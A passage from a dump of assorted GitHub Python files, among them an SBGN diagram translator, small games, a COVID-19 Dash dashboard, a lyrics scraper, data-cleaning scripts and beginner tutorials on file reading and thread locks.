x_comp = x_min - 0.05 * w_comp\n y_comp = y_min - 0.05 * h_comp\n box = libsbgn.bbox(x=x_comp, y=y_comp, w=w_comp, h=h_comp)\n comp.set_bbox(box)\n if comp.get_glyph():\n self.set_uoi_position(comp)\n\n def set_uoi_position(self, gly):\n \"\"\"Computes the dimensions of the bbox of the unit of\n information of the glyph gly. The coordinates of gly must have\n been computed beforehand.\"\"\"\n if gly.get_class() == GlyphClass.COMPARTMENT:\n h_uoi = ParamsLogToAF.HEIGHT_COMPARTMENT_UOI\n else:\n h_uoi = ParamsLogToAF.HEIGHT_GLYPH_UOI\n\n try:\n w_uoi = (ParamsLogToAF.WIDTH_EMPTY_UOI +\n ParamsLogToAF.WIDTH_MAX_LETTER *\n len(gly.get_glyph()[0].get_label().get_text()))\n except AttributeError:\n w_uoi = ParamsLogToAF.WIDTH_EMPTY_UOI\n\n x_gly = gly.get_bbox().get_x()\n y_gly = gly.get_bbox().get_y()\n w_gly = gly.get_bbox().get_w()\n\n x_uoi = x_gly + 0.1 * w_gly\n y_uoi = y_gly - h_uoi / 2.0\n\n box = libsbgn.bbox(x=x_uoi, y=y_uoi, w=w_uoi, h=h_uoi)\n gly.get_glyph()[0].set_bbox(box)\n\n def set_arc_position(self, id_source, id_target, points):\n \"\"\"Computes the path of the arc linking source to target,\n passing through the elements of the list points\n (tuples (x, y))\"\"\"\n source = self.dic_id_glyph[id_source]\n #look for the arc\n for couple in self.dic_glyph_arc[source]:\n if couple[0] == 's':\n possible_target = couple[1].get_target()\n if '.' in possible_target:\n possible_target = possible_target[\n :possible_target.find('.')]\n if possible_target == id_target:\n arc = couple[1]\n break\n #format the points\n trace = []\n for p in points:\n x_p = p[0]\n y_p = p[1]\n (x_p, y_p) = self.coord_dot_to_sbgn(x_p, y_p)\n trace.append(libsbgn.point(x=x_p, y=y_p))\n #add the points to the arc\n if len(trace) > 2:\n #arc.set_start(trace[0])\n arc.set_start(trace[1])\n #arc.set_next(trace[1:len(trace)-1])\n else:\n arc.set_start(trace[0])\n arc.set_end(trace[-1])\n #set the coordinates of any ports involved\n if '.' in arc.get_source():\n self.set_port_position(arc.get_source(), id_source, trace[0])\n if '.' in arc.get_target():\n self.set_port_position(arc.get_target(), id_target, trace[-1])\n\n def set_port_position(self, id_port, id_glyph, point):\n \"\"\"Sets the x and y coordinates of the port of id id_port\n belonging to the glyph of id id_glyph. The point object given\n as a parameter corresponds to the end of an arc the port takes\n part in. If the port has no coordinates yet, those of this\n point are used. Otherwise the previous ones are kept.\"\"\"\n gly = self.dic_id_glyph[id_glyph]\n for port in gly.get_port():\n if port.get_id() == id_port:\n if not port.get_x() and not port.get_y():\n port.set_x(point.get_x())\n port.set_y(point.get_y())\n break\n\n def read_dot(self):\n \"\"\"Reads the .gv.plain file and retrieves the\n positions of the glyphs and arcs.\"\"\"\n dot = codecs.open('position_graph.gv.plain', 'r', 'utf8')\n lines = dot.readlines()\n for i in range(len(lines)):\n lines[i] = lines[i].split()\n self.map.set_bbox(libsbgn.bbox(x=0, y=0,\n w=float(lines[0][2]) * self.resolution * 1.05,\n h=float(lines[0][3]) * self.resolution * 1.05))\n self.max_height = float(lines[0][3]) * self.resolution\n self.max_width = float(lines[0][2]) * self.resolution\n for line in lines[1:]:\n #first pass for the positions of the glyphs,\n #except those of type Compartment\n if line[0] == 'node':\n if self.dic_id_glyph[line[1]] not in self.dic_comp.keys():\n self.set_glyph_position(line[1], float(line[2]),\n float(line[3]), float(line[4]), float(line[5]))\n elif line[0] == 'edge':\n nb_points = int(line[3])\n points = []\n for i in range(0, 2 * nb_points, 2):\n points.append((float(line[4 + i]), float(line[4 + i + 1])))\n self.set_arc_position(line[1], line[2], points)\n for line in lines[1:]:\n #second pass for the positions of the compartments\n if (line[0] == 'node' and\n (self.dic_id_glyph[line[1]] in self.dic_comp.keys())):\n self.set_comp_position(line[1])\n dot.close()\n\n def output_f(self):\n \"\"\"Creates the .sbgn output file\"\"\"\n self.sbgn.write_file(self.f_out)\n\n def translation(self):\n \"\"\"Chains the methods to translate the SBGNLog-AF graph\n into an SBGN-AF graph.\"\"\"\n self.LogAF_to_AF()\n self.output_f()\n \n\n","repo_name":"eleagreugny/LRI","sub_path":"traducteurLogAF_to_AF.py","file_name":"traducteurLogAF_to_AF.py","file_ext":"py","file_size_in_byte":25864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"23876976925","text":"class Solution:\n def checkSubarraySum(self, nums: list[int], k: int) -> bool:\n dic, s = {0: -1}, 0\n for index, val in enumerate(nums):\n if k != 0:\n s = (s + val) % k\n else:\n s += val\n if s not in dic:\n dic[s] = index\n elif index - dic[s] >= 2:\n return True\n return False\n","repo_name":"vishrutkmr7/MyLeetCodeSubmissions","sub_path":"problems/continuous_subarray_sum/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"}
+{"seq_id":"32550300960","text":"\"\"\"\nStreet Pong\nBuild 18 2015\nLeanna Pancoast, Spencer Barton, Justin Frye\n\nPong Game View\n\"\"\"\n\n#=====================================================\n# Imports\n#=====================================================\n\nimport pygame as pg\nimport sys\nimport Pong.PongGameModel as Model\nimport Pong.PongGameView as View\n\n# for gpio\nimport os\n#=====================================================\n# set up gpio\n#=====================================================\nGPIO_MODE_PATH = os.path.normpath('/sys/devices/virtual/misc/gpio/mode/')\nGPIO_PIN_PATH = os.path.normpath('/sys/devices/virtual/misc/gpio/pin/')\nGPIO_FILENAME = \"gpio\"\n\nHIGH = \"1\"\nLOW = \"0\"\nINPUT = \"0\"\nOUTPUT = \"1\"\nINPUT_PU = \"8\"\n\n#=====================================================\n# set pins to be inputs\n#=====================================================\n\nbuttonL_pin_mode = 
os.path.join(GPIO_MODE_PATH, 'gpio'+str(7))\nbuttonR_pin_mode = os.path.join(GPIO_MODE_PATH, 'gpio'+str(12))\n\nbuttonL_pin = os.path.join(GPIO_PIN_PATH, 'gpio'+str(7))\nbuttonR_pin = os.path.join(GPIO_PIN_PATH, 'gpio'+str(12))\n\nfile = open(buttonL_pin_mode, 'r+')\nfile.write(INPUT)\nfile.close()\n\nfile = open(buttonR_pin_mode, 'r+')\nfile.write(INPUT)\nfile.close()\n\n#=====================================================\n# Pong\n#=====================================================\n\nclass Pong(object):\n\n    # TODO pausing/timeout\n    # TODO better graphics\n    # TODO AI when in resting mode\n    # TODO full screen\n    # TODO ball goes over endline\n\n    WIDTH, HEIGHT = 480, 480\n    PADDLE_W = 50\n    PADDLE_H = 6\n    END_ZONE = 30\n    BALL_RADIUS = 10\n    FPS = 50\n    MAX_SCORE = 3\n    GAME_OVER_DELAY = 4800\n\n    def __init__(s):\n        s.size = (s.WIDTH, s.HEIGHT)\n\n        pg.init()\n        s.screen = pg.display.set_mode(s.size, pg.FULLSCREEN)\n        # s.screen = pg.display.set_mode(s.size)\n\n        s.model = Model.PongGameModel('Player1', 'Player2', s.WIDTH, s.HEIGHT, s.END_ZONE, s.PADDLE_W,\n            s.BALL_RADIUS)\n        s.view = View.PongGameView(s.model, s.screen, s.WIDTH, s.HEIGHT, s.END_ZONE, s.PADDLE_W, s.PADDLE_H, \n            s.BALL_RADIUS)\n\n    #==== Public Methods ========================================\n\n    def run(s):\n        clock = pg.time.Clock()\n\n        while True:\n            cmds = s._handleEvts()\n\n            score = s.model.step(cmds[0], cmds[1])\n            \n            if max(score) == s.MAX_SCORE:\n                s.view.gameOver()\n                s.model.reset()\n                pg.time.wait(s.GAME_OVER_DELAY)\n            else:\n                s.view.show()\n            clock.tick(s.FPS)\n    \n    def _handleEvts(s):\n        move1 = s.model.MV_STAY\n        move2 = s.model.MV_STAY\n        \n        # getting input from L button\n        tempL = ['']\n        file = open(buttonL_pin, 'r')\n        tempL[0] = file.read()\n        file.close()\n        \n        # getting input from R button\n        tempR = ['']\n        file = open(buttonR_pin, 'r')\n        tempR[0] = file.read()\n        file.close()\n        \n        pressed = pg.key.get_pressed()\n        if ( '0' in tempL[0] ) :\n            move1 = s.model.MV_LEFT\n        elif ( '0' in tempR[0] ) :\n            move1 = s.model.MV_RIGHT\n        if pressed[pg.K_j]:\n            move2 = s.model.MV_LEFT\n        elif pressed[pg.K_l]:\n            move2 = s.model.MV_RIGHT\n        elif pressed[pg.K_q]:\n            s._quit()\n\n        for event in pg.event.get():\n            if event.type == pg.QUIT:\n                s._quit()\n            elif event.type == pg.KEYDOWN:\n                if event.key == pg.K_q:\n                    s._quit()\n\n        return (move1, move2)\n\n    def _quit(s):\n        pg.display.quit()\n        sys.exit()\n\n\nif __name__ == '__main__':\n    pong = Pong()\n    pong.run()\n","repo_name":"sbarton272/StreetPong","sub_path":"StreetPong/goodButtonPong.py","file_name":"goodButtonPong.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"3850298148","text":"# In 'r' mode a file can be read\n# read reads data from the file\n\n# open the file\nfile = open('python.txt', 'r')\n# read the file\n# n: the number passed to read is the maximum number of characters to read\n# If a project has a large text file, e.g. a 4 GB web novel, reading it in one go is extremely costly and the wait is far too long\n# So in practice we usually cap how much is read at once; the maximum is commonly limited to (1024*1024) characters\n\n# Here read only fetches 3 characters at a time, so how do we read the remaining ones?\n# Each read continues from where the previous one stopped, until the file is closed or the program ends, so we can read in a loop\n# Once all of the file's content has been read, it keeps returning an empty string (\"\")\nwhile True:\n    content = file.read(3)\n    if content == '':\n        break\n    print(content)\n\n# close the file\nfile.close()","repo_name":"yujale/python-learn","sub_path":"python-basics/05-python 文件/01-文件读取.py","file_name":"01-文件读取.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"9405871833","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nplt.ion()\n\n\ndef 
repeat_rows(row,scale):\n\trep_rows = np.array([row,]*scale)\n\treturn rep_rows\n\ndef repeat_columns(row,scale):\n\trep_columns = np.array([row,]*scale).transpose()\n\treturn rep_columns\n\n\ndef image_zooming(img,factor):\n\tlayer = img[:,:]\n\tfor j in range(0,layer.shape[0],factor):\n\t\trow = layer[j,:]\n\t\trows = repeat_rows(row,factor)\n\t\tif j==0:\n\t\t\ttemp_1 = rows\n\t\telse:\n\t\t\ttemp_1 = np.vstack([temp_1,rows])\n\tfor p in range(0,temp_1.shape[1],factor):\n\t\tcol = temp_1[:,p]\n\t\tcols = repeat_columns(col,factor)\n\t\tif p==0:\n\t\t\ttemp_2 = cols\n\t\telse:\n\t\t\ttemp_2 = np.hstack([temp_2,cols])\n\tcanvas = np.uint8(temp_2)\n\treturn canvas\n\n\nif __name__ == '__main__':\n\tfile_name = \"./images/lena512color.tiff\"\n\timg = cv2.imread(file_name)\n\t# cv2.imread returns BGR, so red is channel 2, green is 1, blue is 0\n\tgray = 0.299*img[:,:,2] + 0.587*img[:,:,1] + 0.114*img[:,:,0]\n\t# gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\tmodif = image_zooming(gray,3)\n\tplt.imshow(modif)\n\n","repo_name":"vishnusk12/image_zooming","sub_path":"zoom.py","file_name":"zoom.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"29931002234","text":"\"\"\"\nCreated by Kieran Bates\n\nThis class represents a need that an agent has\n\"\"\"\n\n\nclass Need(object):\n    def __init__(self, name, value=10.0, warning_point=3.0, decay_at=30, decay_amount=0.5):\n        self.value = value\n        self.name = name\n        self.warning_point = warning_point\n        self.decay_at = decay_at\n        self.decay_amount = decay_amount\n        self.decay_time = 0\n        self.max = 10.0\n        self.min = 0.0\n        self.zero_time = 0\n        self.message = \"\"\n\n    def update(self, time=0.0, value=0.0):\n        \"\"\"updates the current need\"\"\"\n        self.decay_time += time\n\n        # update the value\n        self.value += value\n\n        if self.value == 0.0:\n            self.zero_time += time\n        else:\n            self.zero_time = 0\n\n        # check if decay time has reached decay at reset decay time and subtract\n        # decay amount from the value\n        if self.decay_time == self.decay_at:\n            self.decay_time = 0\n            self.value -= self.decay_amount\n\n        # update value if out of bounds to the closest bound\n        if self.value < self.min:\n            self.value = self.min\n        if self.value > self.max:\n            self.value = self.max\n\n        # check if warning point has been reached and if has set message for retrieval\n        if self.value < self.warning_point:\n            self.message = \"Agent's \" + self.name + \" needs to be taken care of\"\n        else:\n            self.message = \"\"\n","repo_name":"kieran100054421/AI_For_Games_Spikes","sub_path":"Spike_13/Spike_13/need.py","file_name":"need.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"17335222489","text":"from typing import Any\n\nfrom dash import dcc\n\n\nclass Tab(dcc.Tab):\n    \"\"\"A dcc.Tab with styling\n\n    Keyword arguments:\n\n    - children (a list of or a singular dash component, string or number; required):\n        The children of this component.\n\n    - style (dict; optional):\n        Additional styling\n\n    - selected_style (dict; optional):\n        Additional styling when the tab is selected\n\n    \"\"\"\n\n    def __init__(\n        self,\n        *args: Any,\n        **kwargs: Any,\n    ) -> None:\n        super().__init__(*args, **kwargs)\n        self.className = \"webviz-tab\"\n        self.selected_className = 
\"webviz-tab-selected\"\n","repo_name":"equinor/webviz-core-components","sub_path":"webviz_core_components/wrapped_components/tab.py","file_name":"tab.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"19264355993","text":"import pandas as pd\nimport os\nimport datetime\nimport numpy as np\n\n#Cleans data to find first X number of retweets and other personalizable Twitter characteristics\n\nos.chdir('../data/fake4_5/')\n\ndir_list = next(os.walk('.'))[1]\ndf = pd.DataFrame(columns=['Folder', 'Retweet Count', 'Time Difference', 'Estimated Time', 'Total Retweeted', 'Retweeted Followers'])\nnf = pd.DataFrame(columns=['Folder','Retweet Count', 'Time Difference', 'Total Retweeted', 'Retweeted Followers'])\nfor folder in dir_list:\n nodes = pd.read_csv(folder + '/new_node.csv')\n nodes['time'] = pd.to_timedelta(nodes['Time Difference'])\n lastRetweet = nodes['retweeted_status.retweet_count'][len(nodes)-1]\n firstRetweets = [nodes['retweeted_status.retweet_count'][0],nodes['retweeted_status.retweet_count'][1]]\n if firstRetweets[0] == firstRetweets[0]:\n retweet = firstRetweets[0]\n time = nodes['time'][0]\n df = df.append(pd.DataFrame({'Folder': folder, 'Retweet Count': firstRetweets[0], 'Time Difference': nodes['time'][0],\n 'Estimated Time': nodes['time'][0]/firstRetweets[0]/np.timedelta64(1,'s'),'Total Retweeted': lastRetweet, 'Retweeted Followers': nodes['retweeted_status.user.followers_count'][3]}, index=[0]), ignore_index=True)\n else:\n retweet = firstRetweets[1]\n time = nodes['time'][1]\n df = df.append(\n pd.DataFrame({'Folder': folder, 'Retweet Count': firstRetweets[1], 'Time Difference': nodes['time'][1],\n 'Estimated Time': nodes['time'][1] / firstRetweets[1] / np.timedelta64(1, 's'),\n 'Total Retweeted': lastRetweet, 'Retweeted Followers': nodes['retweeted_status.user.followers_count'][3]}, index=[0]), ignore_index=True)\n if retweet <= 2 and time <= datetime.timedelta(seconds=10):\n nf = nf.append(\n pd.DataFrame({'Folder': folder, 'Retweet Count': retweet, 'Time Difference': time,\n 'Total Retweeted': lastRetweet,'Retweeted Followers': nodes['retweeted_status.user.followers_count'][3]}, index=[0]), ignore_index=True)\n nf.to_csv('usableTimes.csv', index=False)\n df.to_csv('allTimes.csv', index=False)\n\n\n\n","repo_name":"cindysi21/misinformationTrump","sub_path":"code/quickRetweet.py","file_name":"quickRetweet.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41289306650","text":"from selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# sets the options to a headless browser\n\noptions = Options()\noptions.headless = True\nbrowser = webdriver.Chrome('/users/ethan/Desktop/chromedriver', options=options)\n\n# getting user data and parsing the url\nprint('Please enter the lyrics of a song')\nlyrics = input()\nurl = 'https://findmusicbylyrics.com/search?q=' + lyrics.replace(\" \", \"+\")\n\n# launches headless browser\nbrowser.get(url)\n\n# gets the data based on the class names\nfirst_song = browser.find_element_by_class_name('gs-title')\nsample_lyrics = browser.find_element_by_class_name('gs-snippet')\n\n# prints and formats to remove unnecessary characters\nprint('\\n' + first_song.text.split(\"Lyrics\")[0] + '\\nSample Lyrics:\\n\\n' + sample_lyrics.text.split(': 
')[-1])\nbrowser.close()\n","repo_name":"subhyde/find-song-by-lyrics","sub_path":"songfinder.py","file_name":"songfinder.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36344529824","text":"import pygame\nfrom gameObject import GameObject\nfrom player import Player\nfrom enemy import Enemy\n\n\nclass Game:\n\n def __init__(self):\n self.act_player = None\n self.sys_running = True\n self.vid_size = (800, 800)\n self.sys_color_white = (255, 255, 255)\n self.sys_clock_rate = 120\n self.sys_window = pygame.display.set_mode(self.vid_size)\n self.sys_clock = pygame.time.Clock()\n self.tro_enemies = []\n self.var_level = 1\n self.var_reset = False\n\n ast_background = pygame.image.load('assets/background.png')\n self.vid_scale = (self.vid_size[0] / ast_background.get_width(), self.vid_size[1] / ast_background.get_height())\n\n self.obj_background = GameObject(0, 0, self.vid_size[0], self.vid_size[1], 'assets/background.png', None)\n self.obj_treasure = GameObject(382, 114, 14, 12, 'assets/treasure.png', self.vid_scale)\n self.init_actors()\n\n def init_actors(self):\n self.act_player = Player(375, 700, 12, 16, 'assets/player.png', self.vid_scale, 5, 0, 'x')\n self.tro_enemies = [\n Enemy(100, 500, 16, 12, 'assets/enemy.png', self.vid_scale, 5, 1, 'y', 1),\n Enemy(700, 350, 16, 12, 'assets/enemy.png', self.vid_scale, 5, 2, 'y', 3),\n Enemy(100, 200, 16, 12, 'assets/enemy.png', self.vid_scale, 5, 3, 'y', 5),\n ]\n\n def handle_events(self):\n events = pygame.event.get()\n for event in events:\n if event.type == pygame.QUIT:\n self.sys_running = False\n elif event.type == pygame.KEYDOWN:\n self.act_player.setDirection(event.key)\n elif event.type == pygame.KEYUP:\n self.act_player.resetDirection()\n\n def control_logic(self):\n self.act_player.move(self.vid_size[0])\n for act_enemy in self.tro_enemies:\n if act_enemy.level <= self.var_level:\n act_enemy.move(self.vid_size[0])\n\n def draw_objects(self):\n # Static Objects\n self.sys_window.fill(self.sys_color_white)\n self.sys_window.blit(self.obj_background.image, (self.obj_background.x, self.obj_background.y))\n self.sys_window.blit(self.obj_treasure.image, (self.obj_treasure.x, self.obj_treasure.y))\n # Moving Objects\n self.sys_window.blit(self.act_player.image, (self.act_player.x, self.act_player.y))\n for act_enemy in self.tro_enemies:\n if act_enemy.level <= self.var_level:\n self.sys_window.blit(act_enemy.image, (act_enemy.x, act_enemy.y))\n pygame.display.update()\n\n @staticmethod\n def detect_collision(object_a, object_b):\n if object_a.y > (object_b.y + object_b.height):\n return False\n elif (object_a.y + object_a.height) < object_b.y:\n return False\n if object_a.x > (object_b.x + object_b.width):\n return False\n elif (object_a.x + object_a.width) < object_b.x:\n return False\n return True\n\n def check_collision(self):\n for act_enemy in self.tro_enemies:\n if (act_enemy.level <= self.var_level) and self.detect_collision(self.act_player, act_enemy):\n self.var_level = 1\n self.var_reset = True\n return\n if self.detect_collision(self.act_player, self.obj_treasure):\n self.var_level += 1\n self.var_reset = True\n return\n\n def reset_board(self):\n if not self.var_reset:\n return\n else:\n self.init_actors()\n return\n\n def run_game_loop(self):\n while self.sys_running:\n self.handle_events()\n self.control_logic()\n self.draw_objects()\n self.check_collision()\n self.reset_board()\n self.var_reset = False\n 
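# pg.time.Clock.tick(rate) sleeps just long enough to cap the loop at sys_clock_rate iterations per second\n            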
self.sys_clock.tick(self.sys_clock_rate)\n","repo_name":"camcleod99/pyGame","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"25133796182","text":"import numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objects as go\r\nimport dash\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash.dependencies import Input,Output\r\n\r\n\r\n#python code\r\npatients=pd.read_csv('IndividualDetails.csv')\r\n\r\ntotal=patients.shape[0]\r\nactive=patients[patients['current_status']=='Hospitalized'].shape[0]\r\nrecovered=patients[patients['current_status']=='Recovered'].shape[0]\r\ndeaths=patients[patients['current_status']=='Deceased'].shape[0]\r\n\r\n\r\nmain=pd.read_csv('covid_19_india.csv')\r\nmain['total']=main['ConfirmedIndianNational'] + main['ConfirmedForeignNational']\r\nmain['total']=np.cumsum(main['total'].values)\r\n\r\nage=pd.read_csv('AgeGroupDetails.csv')\r\n\r\noptions=[\r\n    {'label':'Hospitalized', 'value':'Hospitalized'},\r\n    {'label':'Recovered', 'value':'Recovered'},\r\n    {'label': 'Deceased', 'value':'Deceased'}\r\n]\r\n\r\n# external CSS stylesheets\r\nexternal_stylesheets = [\r\n    {\r\n        'href': 'https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/css/bootstrap.min.css',\r\n        'rel': 'stylesheet',\r\n        'integrity': 'sha384-MCw98/SFnGE8fJT3GXwEOngsV7Zt27NXFoaoApmYm81iuXoPkFOJwJ8ERdknLPMO',\r\n        'crossorigin': 'anonymous'\r\n    }\r\n]\r\n\r\napp=dash.Dash(__name__,external_stylesheets=external_stylesheets)\r\nserver = app.server\r\n\r\napp.layout=html.H1('hello world welcome to python')\r\n\r\napp.layout=html.Div(children=[\r\n    html.H1(\"India's Covid 19 Dashboard\",style={'color':'#fff','text-align':'center','backgroundColor':'blue'}),\r\n    html.Div([\r\n        html.Div([\r\n            html.Div([\r\n                html.Div([html.H3(\"Total Cases\", className=\"text-white\"),\r\n                          html.H4(total,className=\"text-white\")\r\n                ],className=\"card-body\")\r\n            ],className=\"card bg-danger\")\r\n        ],className=\"col-md-3\"),\r\n\r\n        html.Div([html.Div([\r\n            html.Div([html.H3(\"Active Cases\", className=\"text-white\"),\r\n                      html.H4(active,className=\"text-white\")\r\n            ],className=\"card-body\")\r\n        ],className=\"card bg-info\")\r\n        ],className='col-md-3'),\r\n\r\n        html.Div([html.Div([\r\n            html.Div([html.H3(\"Recovered\", className=\"text-white\"),\r\n                      html.H4(recovered,className=\"text-white\")\r\n            ],className=\"card-body\")\r\n        ],className=\"card bg-success\")\r\n        ],className='col-md-3'),\r\n\r\n        html.Div([html.Div([\r\n            html.Div([html.H3(\"Deaths\", className=\"text-white\"),\r\n                      html.H4(deaths,className=\"text-white\")\r\n            ],className=\"card-body\")\r\n        ],className=\"card bg-warning\")\r\n        ],className='col-md-3'),\r\n\r\n    ],className='row'),\r\n\r\n    html.Div([\r\n        html.Div([\r\n            html.Div([\r\n                html.Div([dcc.Graph(id='line plot',figure={'data':[go.Scatter(x=main['Date'],y=main['total'],mode='lines')],\r\n                                                           'layout':go.Layout(title='Day By Day Analysis',xaxis={'title':'Date'},yaxis={'title':'number of cases'})})\r\n                ],className='card-body')\r\n            ],className='card')\r\n        ],className='col-md-8'),\r\n\r\n        html.Div([\r\n            html.Div([\r\n                html.Div([\r\n                    dcc.Graph(id='pie', figure={'data': [go.Pie(labels=age['AgeGroup'], values=age['TotalCases'])],\r\n                                                'layout': go.Layout(title='Age Distribution')})],className='card-body')\r\n            ],className='card')\r\n        ],className='col-md-4')\r\n    ],className='row' ,style={'margin-top':'50px'}),\r\n\r\n    html.Div([\r\n        
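# bottom row: the 'picker' dropdown drives the state-wise bar chart through the callback below\r\n        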
html.Div([\r\n            html.Div([\r\n                html.Div([\r\n                    dcc.Dropdown(id='picker',options=options,value='All'),\r\n                    dcc.Graph(id='bar')\r\n                ],className='card-body')\r\n            ],className='card')\r\n        ],className='col-md-12')\r\n    ],className='row',style={'margin-top':'50px'})\r\n],className='container')\r\n\r\n@app.callback(Output('bar','figure'),[Input('picker','value')])\r\ndef update_graph(type):\r\n    if type=='All':\r\n        pbar = patients.groupby('detected_state').count()['id'].reset_index()\r\n\r\n    else:\r\n        new = patients[patients['current_status'] == type]\r\n        pbar = new.groupby('detected_state').count()['id'].reset_index()\r\n\r\n    return {'data': [go.Bar(x=pbar['detected_state'], y=pbar['id'])],\r\n            'layout': go.Layout(title='State Wise Total Cases')}\r\n\r\n\r\nif __name__=='__main__':\r\n    app.run_server(debug=True)","repo_name":"rrpatil-1/Covid-Dashboard","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"43327573519","text":"###########\n# Imports #\n###########\n\nimport unittest\n\n\n###################\n# Testing Library #\n###################\nfrom Project_Euler.problem_sets.problem_8 import split_number_to_list, create_list_sets, get_highest_value, \\\n    multiply_item_in_list\n\n\nclass TestProjectEuler(unittest.TestCase):\n    def test_split_number_to_list(self):\n        n = 2345\n        expected_res = [2,3,4,5]\n        res = split_number_to_list(n)\n\n        self.assertEqual(expected_res, res)\n\n    def test_create_list_sets(self):\n        lst = [2,3,4,5]\n        n = 3\n        expected_res = [[2,3,4],[3,4,5]]\n        res = create_list_sets(lst, n)\n\n        self.assertEqual(expected_res, res)\n\n    def test_multiply_item_in_list(self):\n        lst = [2, 3, 4, 5]\n        expected_res = 120\n        res = multiply_item_in_list(lst)\n\n        self.assertEqual(expected_res, res)\n\n\n##################\n# Test Functions #\n##################\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"LeftysWorld/Python_Tools","sub_path":"Project_Euler/test/problem_sets/problem_8.py","file_name":"problem_8.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"29993577082","text":"\"\"\"\n    The biggest difference between multithreading and multiprocessing:\n    in multiprocessing, each process holds its own copy of every variable, so processes do not affect each other;\n    in multithreading, all variables are shared by all threads, so any variable can be modified by any thread\n\"\"\"\nimport time,threading\nbalance = 0\n\n\ndef change_it(n):\n    # deposit first, then withdraw; the result should be 0\n    global balance\n    balance = balance + n\n    balance = balance - n\n\n\ndef run_thread(n):\n    for i in range(100000):  # make sure it runs enough times\n        change_it(n)\n\n\n\"\"\"\n    Modifying balance takes several statements, and a thread may be interrupted while executing them\n    initial value balance = 0\n\nt1: x1 = balance + 5 # x1 = 0 + 5 = 5\n\nt2: x2 = balance + 8 # x2 = 0 + 8 = 8\nt2: balance = x2 # balance = 8\n\nt1: balance = x1 # balance = 5\nt1: x1 = balance - 5 # x1 = 5 - 5 = 0\nt1: balance = x1 # balance = 0\n\nt2: x2 = balance - 8 # x2 = 0 - 8 = -8\nt2: balance = x2 # balance = -8\n\nresult balance = -8\n\"\"\"\n# lock change_it() so that other threads can only access the variable after one thread has finished modifying it\nlock = threading.Lock()\n\ndef run_thread1(n):\n    for i in range(10000):\n        # the lock must be acquired first\n        lock.acquire()\n        try:\n            change_it(n)\n        finally:\n            # always release the lock when done\n            lock.release()\n\nt1 = threading.Thread(target=run_thread, args=(5,))\nt2 = threading.Thread(target=run_thread, args=(8,))\nt1.start()\nt2.start()\nt1.join()\nt2.join()\nprint(balance)\n\n\"\"\"\n    Python threads are real threads, but when the interpreter executes code\n    there is a GIL (Global Interpreter Lock): before any Python thread can run it must acquire the GIL,\n    and after every 100 bytecodes the interpreter automatically releases it so other threads get a chance to run.\n    This global GIL effectively puts a lock on the code of every thread,\n    
so in Python multiple threads can only take turns: even 100 threads on a 100-core CPU will use just 1 core.\n    Running as many busy loops as there are CPU cores still saturates only one core,\n    while other languages such as C\\C++ or Java can max out every core\n\ndef deadloop(x):\n    while True:\n        x = x ^ 1\n\nt1 = threading.Thread(target=deadloop, args=(5,))\nt2 = threading.Thread(target=deadloop, args=(6,))\nt3 = threading.Thread(target=deadloop, args=(9,))\nt4 = threading.Thread(target=deadloop, args=(4,))\nt1.start()\nt2.start()\nt3.start()\nt4.start()\nt1.join()\nt2.join()\nt3.join()\nt4.join()\n\n\nBecause the Python interpreter was designed with the global GIL, multithreading cannot exploit multiple cores.\nConcurrent multithreading in Python is just a beautiful dream,\nbut multiprocessing can use multiple cores\n\"\"\"","repo_name":"Philex5/Python-Learn","sub_path":"Python-learn/9.Process&Thread/7.Lock.py","file_name":"7.Lock.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
